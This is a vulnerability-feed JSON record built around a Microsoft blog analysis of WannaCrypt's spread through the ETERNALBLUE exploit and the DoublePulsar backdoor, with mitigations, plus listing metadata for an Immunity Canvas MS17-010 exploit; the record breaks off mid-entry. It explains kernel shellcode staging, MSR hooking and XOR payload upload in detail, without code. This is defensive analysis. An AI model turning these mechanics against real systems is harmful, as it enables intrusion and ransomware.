"MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["SMNTC-96705"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0145"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["CVE-2017-0145"], "type": "cve"}], "rev": 2}, "score": {"modified": "2017-09-15T09:08:41", "rev": 2, "value": 7.1, "vector": "NONE"}}, "hash": "2b0d7fef6fac596fbf0a24d74105d3456d00af17666278279f3b59cd5c45fdc8", "hashmap": [{"hash": "9158c03164fb6db0c440fdb287e68855", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "6e85843f0a1ea97153b93d90b1fbe01c", "key": "cvelist"}, {"hash": "4e457e516171c49f292e8aa2146ca307", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "63a4a976f3c89eaa70e50a2c25ba2834", "key": "modified"}, {"hash": "f0bf0c408802a9b71e13a50fb429713c", "key": "title"}, {"hash": "126ac9f6149081eb0e97c2e939eaad52", "key": "bulletinFamily"}, {"hash": "63a4a976f3c89eaa70e50a2c25ba2834", "key": "published"}, {"hash": "896dd514d3c2f23798f33d98b9b71e55", "key": "description"}, {"hash": "2206031ddfa442c2eb57dd17e9fcf174", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}], "history": [], "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/30/exploring-the-crypt-analysis-of-the-wannacrypt-ransomware-smb-exploit-propagation/", "id": "MMPC:89789F73D15A0B331512F90F7E692851", "immutableFields": [], "lastseen": "2017-09-15T09:08:41", "modified": "2017-06-30T13:00:00", "objectVersion": "1.5", "published": "2017-06-30T13:00:00", "references": [], "reporter": "msft-mmpc", "title": "Exploring the crypt: Analysis of the WannaCrypt ransomware SMB exploit propagation", "type": "mmpc", "viewCount": 1019}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2017-09-15T09:08:41"}], "modified": "2017-06-30T13:00:00", "lastseen": "2017-09-15T09:08:41", "published": "2017-06-30T13:00:00", "description": "_(Note: Read our latest comprehensive report on ransomware: [**Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene**](<https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/>).)_\n\n \n\nOn May 12, there was a major outbreak of [WannaCrypt ransomware](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>). WannaCrypt directly borrowed exploit code from the ETERNALBLUE exploit and the DoublePulsar backdoor module leaked in April by a group calling itself Shadow Brokers.\n\nUsing ETERNALBLUE, WannaCrypt propagated as a worm on older platforms, particularly Windows 7 and Windows Server 2008 systems that haven't patched against the SMB1 vulnerability CVE-2017-0145. The resulting ransomware outbreak reached a large number of computers, even though Microsoft released security bulletin [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) to address the vulnerability on March 14, almost two months before the outbreak.\n\nThis post\u2014complementary to our earlier post about the [ETERNALBLUE and ETERNALROMANCE exploits released by Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>)\u2014takes us through the WannaCrypt infection routine, providing even more detail about post-exploitation phases. It also describes other existing mitigations as well as new and upcoming mitigation and detection techniques provided by Microsoft to address similar threats.\n\n## Infection cycle\n\nThe following diagram summarizes the WannaCrypt infection cycle: initial shellcode execution, backdoor implantation and package upload, kernel and userland shellcode execution, and payload launch.\n\n\n\n_Figure 1. WannaCrypt infection cycle overview_\n\nThe file _mssecsvc.exe_ contains the main exploit code, which launches a network-level exploit and spawns the ransomware package. The exploit code targets a kernel-space vulnerability and involves multi-stage shellcode in both kernel and userland processes. Once the exploit succeeds, communication between the DoublePulsar backdoor module and _mssecsvc.exe_ is encoded using a pre-shared XOR key, allowing transmission of the main payload package and eventual execution of ransomware code.\n\n## Exploit and initial shellcodes\n\nIn an earlier [blog post](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>), Viktor Brange provided a detailed analysis of the vulnerability trigger and the _instruction pointer_ control mechanism used by ETERNALBLUE. After the code achieves instruction pointer control, it focuses on acquiring persistence in kernel space using kernel shellcode and the DoublePulsar implant. It then executes the ransomware payload in user space.\n\n### Heap spray\n\nThe exploit code sprays memory on a target computer to lay out space for the first-stage shellcode. It uses non-standard SMB packet segments to make the allocated memory persistent on _hardware abstraction layer_ (HAL) memory space. It sends 18 instances of heap-spraying packets, which have direct binary representations of the first-stage shellcode.\n\n\n\n_Figure 2. Shellcode heap-spraying packet_\n\n### Initial shellcode execution: first and second stages\n\nThe exploit uses a _function-pointer overwrite _technique to direct control flow to the first-stage shellcode. This shellcode installs a second-stage shellcode as a _SYSENTER_ or _SYSCALL_ routine hook by overwriting _model-specific registers_ (MSRs). If the target system is x86-based, it hooks the SYSENTER routine by overwriting _IA32_SYSENTER_EIP_. On x64-based systems, it overwrites _IA32_LSTAR_ MSR to hook the SYSCALL routine. More information about these MSRs can be found in [Intel\u00ae 64 and IA-32 Architectures Software Developer's Manual Volume 3C](<https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-3c-part-3-manual.pdf>).\n\n\n\n_Figure 3. First-stage shellcode for x86 systems_\n\nOriginally, the IA32_SYSENTER_EIP contains the address to _nt!KiFastCallEntry_ as its SYSENTER routine.\n\n\n\n_Figure 4. Original IA32_SYSENTER_EIP value pointing to KiFastCallEntry_\n\nAfter modification by the first-stage shellcode, IA32_SYSENTER_EIP now points to the second-stage shellcode.\n\n\n\n_Figure 5. Modified IA32_SYSENTER_EIP value points to the main shellcode_\n\nThe first-stage shellcode itself runs in _DISPATCH_LEVEL_. By running the second-stage shellcode as the SYSENTER routine, the first-stage code guarantees that the second-stage shellcode runs in _PASSIVE_LEVEL_, giving it access to a broader range of kernel APIs and paged-out memory. And although the second-stage shellcode delivered with this malware actually doesn't access any paged pools or call APIs that require running in PASSIVE_LEVEL, this approach allows attackers to reuse the same module for more complicated shellcode.\n\n## Backdoor implantation\n\nThe second-stage shellcode, now running on the targeted computer, generates a master XOR key for uploading the payload and other communications. It uses system-specific references, like addresses of certain APIs and structures, to randomize the key.\n\n\n\n_Figure 6. Master XOR key generation_\n\nThe second-stage shellcode implants DoublePulsar by patching the SMB1 _Transaction2 _dispatch table. It overwrites one of the reserved command handlers for the _SESSION_SETUP (0xe)_ subcommand of the Transaction2 request. This subcommand is reserved and not commonly used in regular code.\n\n\n\n_Figure 7. Copying packet-handler shellcode and overwriting the dispatch table_\n\nThe following code shows the dispatch table after the subcommand backdoor is installed.\n\n\n\n_Figure 8. Substitution of 0xe command handler_\n\n## Main package upload\n\nTo start uploading its main package, WannaCrypt sends multiple ping packets to the target, testing if its server hook has been installed. Remember that the second-stage shellcode runs as a _SYSENTER _hook\u2014there is a slight delay before it runs and installs the dispatch-table backdoor. The response to the ping packet contains the randomly generated XOR master key to be used for communication between the client and the targeted server.\n\n\n\n_Figure 9. Code that returns original XOR key_\n\nThis XOR key value is used only after some bit shuffling. The shuffling algorithm basically looks like the following Python code.\n\n\n\n_Figure 10. XOR bit-shuffling code_\n\nThe upload of the encoded payload consists of multiple packets as shown below.\n\n\n\n_Figure 11. SMB Transaction2 packet showing payload upload operation_\n\nThe hooked handler code for the unimplemented subcommand processes the packet bytes, decoding them using the pre-shared XOR key. The picture above shows that the SESSION_SETUP parameter fields are used to indicate the offset and total lengths of payload bytes. The data is 12 bytes long\u2014the first four bytes indicate total length, the next four bytes is reserved, and the last 4 bytes are the current offsets of the payload bytes in little-endian. These fields are encoded with master XOR key.\n\nBecause the reserved field is supposed to be 0, the reserved field is actually the same as the master XOR key. Going back to the packet capture above, the reserved field value is 0x38a9dbb6, which is the master XOR key. The total length is encoded as 0x38f9b8be. When this length is XORed with the master XOR key, it is 0x506308, which is the actual length of the payload bytes being uploaded. The last field is 0x38b09bb6. When XORed with the master key, this last field becomes 0, meaning this packet is the first packet of the payload upload.\n\nWhen all the packets are received, the packet handler in the second-stage shellcode jumps to the start of the decoded bytes.\n\n\n\n_Figure 12. Decoding and executing shellcode_\n\nThe transferred and decoded bytes are of size 0x50730c. As a whole, these packet bytes include kernel shellcode, userland shellcode, and the main WannaCrypt PE packages.\n\n## Executing the kernel shellcode\n\nThe kernel shellcode looks for a kernel image base and resolves essential functions by parsing PE structures. The following figure shows the APIs resolved by the shellcode:\n\n\n\n_Figure 13. Resolved kernel functions_\n\nIt uses [_ZwAllocateVirtualMemory_](<https://msdn.microsoft.com/en-us/library/windows/hardware/ff566416\\(v=vs.85\\).aspx>) to allocate a large chunk of RWX memory (0x506d70 in this case). This memory holds the userland shellcode and the main PE packages.\n\n\n\n_Figure 14. RWX memory allocation through ZwAllocateVirtualMemory_\n\nThe kernel shellcode goes through processes on the system and injects userland shellcode to the _lsass.exe_ process using an asynchronous procedure call (APC).\n\n\n\n_Figure 15. APC routines for injecting shellcode to a thread in a userland process_\n\n## Userland shellcode\u2014the start of a new infection cycle\n\nAfter multiple calls to [_VirtualProtect_](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa366898\\(v=vs.85\\).aspx>) and PE layout operations, the shellcode loads a bootstrap DLL using a reflective DLL loading method. The WannaCrypt user-mode component contains this bootstrap DLL for both 64- and 32-bit Windows.\n\n\n\n_Figure 16. Bootstrap DLL functions_\n\nThis bootstrap DLL reads the main WannaCrypt payload from the resource section and writes it to a file _C:\\WINDOWS\\mssecsvc.exe_. It then launches the file using the [_CreateProcess_](<https://msdn.microsoft.com/en-us/library/windows/desktop/ms682425\\(v=vs.85\\).aspx>) API. At this stage, a new infection cycle is started on the newly infected computer.\n\n \n\n\n\n_Figure 17. Dropping main payload to file system_\n\n\n\n_Figure 18. Creating the main payload process_\n\n## Mitigating and detecting WannaCrypt\n\nWannaCrypt borrowed most of its attack code from those leaked by Shadow Brokers, specifically the ETERNALBLUE kernel exploit code and the DoublePulsar kernel-level backdoor. It leverages DoublePulsar's code execution mechanisms and _asynchronous procedure calls_ (APCs) at the kernel to deliver its main infection package and ransomware payload. It also uses the system file _lsass.exe_ as its injection target.\n\n### Mitigation on newer platforms and upcoming SMB updates\n\nThe ETERNALBLUE exploit code worked only on older OSes like Windows 7 and Windows Server 2008, particularly those that have _not_ applied security updates released with security bulletin [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>). The exploit was limited to these platforms because it depended on executable memory allocated in kernel HAL space. Since Windows 8 and Windows Server 2012, HAL memory has stopped being executable. Also, for additional protection, predictable addresses in HAL memory space have been randomized since Windows 10 Creators Update.\n\nWith the upcoming Windows 10 Fall Creators Update (also known as RS3), many dispatch tables in legacy SMB1 drivers, including the _Transaction2_ dispatch table (_SrvTransaction2DispatchTable_) memory area, will be set to read-only as a defense-in-depth measure. The backdoor mechanism described here will be much less attractive to attackers because the mechanism will require additional exploit techniques for unlocking the memory area and overwriting function pointers. Furthermore, SMB1 has already been deprecated for years. With the RS3 releases for Windows 10 and Windows Server 2016, [SMB1 will be disabled](<https://blogs.technet.microsoft.com/filecab/2017/06/01/smb1-product-clearinghouse/>).\n\n### Hyper Guard virtualization-based security\n\nWannaCrypt employs multiple techniques to achieve full code execution on target systems. The IA32_SYSENTER_EIP modification technique used by WannaCrypt to run the main shellcode is actually commonly observed when kernel rootkits try to hook system calls. [_Kernel Patch Protection_](<https://blogs.msdn.microsoft.com/windowsvistasecurity/2006/08/12/an-introduction-to-kernel-patch-protection/>) (or PatchGuard) typically detects this technique by periodically checking for modifications of MSR values. WannaCrypt hooking, however, is too brief for PatchGuard to fire. Windows 10, armed with virtualization-based security (VBS) technologies such as [_Hyper Guard_](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>), can detect and mitigate this technique because it fires as soon as the malicious _wrmsr_ instruction to modify the MSR is executed.\n\n_To enable Hyper Guard on systems with supported processors, use Secure Boot and _[_enable Device Guard_](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/device-guard-deployment-guide>)_. Use the _[_hardware readiness tool_](<https://www.microsoft.com/en-us/download/details.aspx?id=53337>)_ to check if your hardware system supports Device Guard. Device Guard runs on the Enterprise and Education editions of Windows 10._\n\n### Post-breach detection with Windows Defender ATP\n\nIn addition to VBS mitigation provided with Hyper Guard, [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>) (Windows Defender ATP) can detect injection of code to userland processes, including the method used by WannaCrypt. Our researchers have also added new detection logic so that Windows Defender ATP flags highly unusual events that involve spawning of processes from _lsass.exe_.\n\n\n\n_Figure 19. Windows Defender ATP detection of an anomalous process spawned from a system process_\n\nWhile the detection mechanism for process spawning was pushed out in response to WannaCrypt, this mechanism and detection of code injection activities also enable Windows Defender ATP customers to uncover sophisticated breaches that leverage similar attack methods.\n\n**Matt Oh** \n_Windows Defender ATP Research Team_", "title": "Exploring the crypt: Analysis of the WannaCrypt ransomware SMB exploit propagation", "cvelist": ["CVE-2017-0145"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 1125, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27613"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2017-09-15T09:08:41", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2017-09-15T09:08:41", "rev": 2}}, "reporter": "msft-mmpc", "bulletinFamily": "blog", "objectVersion": "1.5", "type": "mmpc", "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hash": "080dae4ea66265fa78479c14627307740cef06e322e71100de23a9480440e2a8", "hashmap": [{"key": "bulletinFamily", "hash": "126ac9f6149081eb0e97c2e939eaad52"}, {"key": "cvelist", "hash": "6e85843f0a1ea97153b93d90b1fbe01c"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "896dd514d3c2f23798f33d98b9b71e55"}, {"key": "href", "hash": "4e457e516171c49f292e8aa2146ca307"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "63a4a976f3c89eaa70e50a2c25ba2834"}, {"key": "published", "hash": "63a4a976f3c89eaa70e50a2c25ba2834"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9158c03164fb6db0c440fdb287e68855"}, {"key": "title", "hash": "f0bf0c408802a9b71e13a50fb429713c"}, {"key": "type", "hash": "2206031ddfa442c2eb57dd17e9fcf174"}], "scheme": null}], "canvas": [{"id": "MS17_010", "bulletinFamily": "exploit", "title": "Immunity Canvas: MS17_010", "description": "**Name**| ms17_010 \n---|--- \n**CVE**| CVE-2017-0143, CVE-2017-0146 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| MS17-010 \n**Notes**| CVE Name: CVE-2017-0143, CVE-2017-0146 \nVENDOR: Microsoft \nNOTES: https://github.com/worawit/MS17-010 \nhttps://www.crowdstrike.com/blog/badrabbit-ms17-010-exploitation-part-one-leak-and-control/ \nhttps://www.crowdstrike.com/blog/badrabbit-ms17-010-exploitation-part-two-elevate-privileges/ \nhttps://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf \nTested on: \n\\- Windows 10 Enterprise N 14393 64bit \n\\- Windows 8.1 9600 32bit \n\\- Windows 7 Home Basic 7601 Service Pack 1 64bit \n\\- Windows 7 Professional N 7601 Service Pack 1 32bit \n \n\\- Windows Server 2016 Standard 14393 \n\\- Windows Server 2012 R2 Standard 9600 \n\\- Windows Server 2008 R2 Datacenter 7600 64bit \n \nVersionsAffected: \nRepeatability: Infinite \nMSADV: MS17-010 \nReferences: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010 \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 \nDate public: 03/16/2017 \nCVSS: 9.3 \n\n", "published": "2017-03-17T00:59:00", "modified": "2017-03-17T00:59:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms17_010", "reporter": "Immunity Canvas", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0143"], "type": "canvas", "lastseen": "2021-07-28T14:33:36", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "**Name**| ms17_010 \n---|--- \n**CVE**| CVE-2017-0143, CVE-2017-0146 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| MS17-010 \n**Notes**| CVE Name: CVE-2017-0143, CVE-2017-0146 \nVENDOR: Microsoft \nNOTES: https://github.com/worawit/MS17-010 \nhttps://www.crowdstrike.com/blog/badrabbit-ms17-010-exploitation-part-one-leak-and-control/ \nhttps://www.crowdstrike.com/blog/badrabbit-ms17-010-exploitation-part-two-elevate-privileges/ \nhttps://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf \nTested on: \n\\- Windows 10 Enterprise N 14393 64bit \n\\- Windows 8.1 9600 32bit \n\\- Windows 7 Home Basic 7601 Service Pack 1 64bit \n\\- Windows 7 Professional N 7601 Service Pack 1 32bit \n \n\\- Windows Server 2016 Standard 14393 \n\\- Windows Server 2012 R2 Standard 9600 \n\\- Windows Server 2008 R2 Datacenter 7600 64bit \n \nVersionsAffected: \nRepeatability: Infinite \nMSADV: MS17-010 \nReferences: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010 \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 \nDate public: 03/16/2017 \nCVSS: 9.3 \n\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-11-01T14:03:33", "references": [{"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ETERNALBLUE"], "type": "canvas"}, {"idList": ["CVE-2017-0146", "CVE-2017-0143"], "type": "cve"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["SMNTC-96707", "SMNTC-96703"], "type": "symantec"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}]}, "score": {"modified": "2018-11-01T14:03:33", "value": 5.0, "vector": "NONE"}}, "hash": "89644140a5b62e0842d05455ea69f8ffdae9ffd2d0f28954cd7470fa9b2086ec", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "206c88939ab5a83df743f16043cf2bfb", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "104e09b5ff5b1ce3bc17f5fe64295116", "key": "published"}, {"hash": "fcc790c72a86190de1b549d0ddc6f55c", "key": "type"}, {"hash": "886297e4ad999f269e3a85b85f7bbdd0", "key": "description"}, {"hash": "14b43373035e95c34886272d7dc25baa", "key": "href"}, {"hash": "104e09b5ff5b1ce3bc17f5fe64295116", "key": "modified"}, {"hash": "8e708b071b800ae1142b16ab81c46b63", "key": "title"}, {"hash": "403ed403becfd91e34c7d282e2a3b12f", "key": "reporter"}], "history": [], "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms17_010", "id": "MS17_010", "lastseen": "2018-11-01T14:03:33", "modified": "2017-03-16T20:59:04", "objectVersion": "1.3", "published": "2017-03-16T20:59:04", "references": [], "reporter": "Immunity Canvas", "title": "Immunity Canvas: MS17_010", "type": "canvas", "viewCount": 502}, "differentElements": ["cvss", "published", "modified"], "edition": 1, "lastseen": "2018-11-01T14:03:33"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "**Name**| ms17_010 \n---|--- \n**CVE**| CVE-2017-0143, CVE-2017-0146 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| MS17-010 \n**Notes**| CVE Name: CVE-2017-0143, CVE-2017-0146 \nVENDOR: Microsoft \nNOTES: https://github.com/worawit/MS17-010 \nhttps://www.crowdstrike.com/blog/badrabbit-ms17-010-exploitation-part-one-leak-and-control/ \nhttps://www.crowdstrike.com/blog/badrabbit-ms17-010-exploitation-part-two-elevate-privileges/ \nhttps://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf \nTested on: \n\\- Windows 10 Enterprise N 14393 64bit \n\\- Windows 8.1 9600 32bit \n\\- Windows 7 Home Basic 7601 Service Pack 1 64bit \n\\- Windows 7 Professional N 7601 Service Pack 1 32bit \n 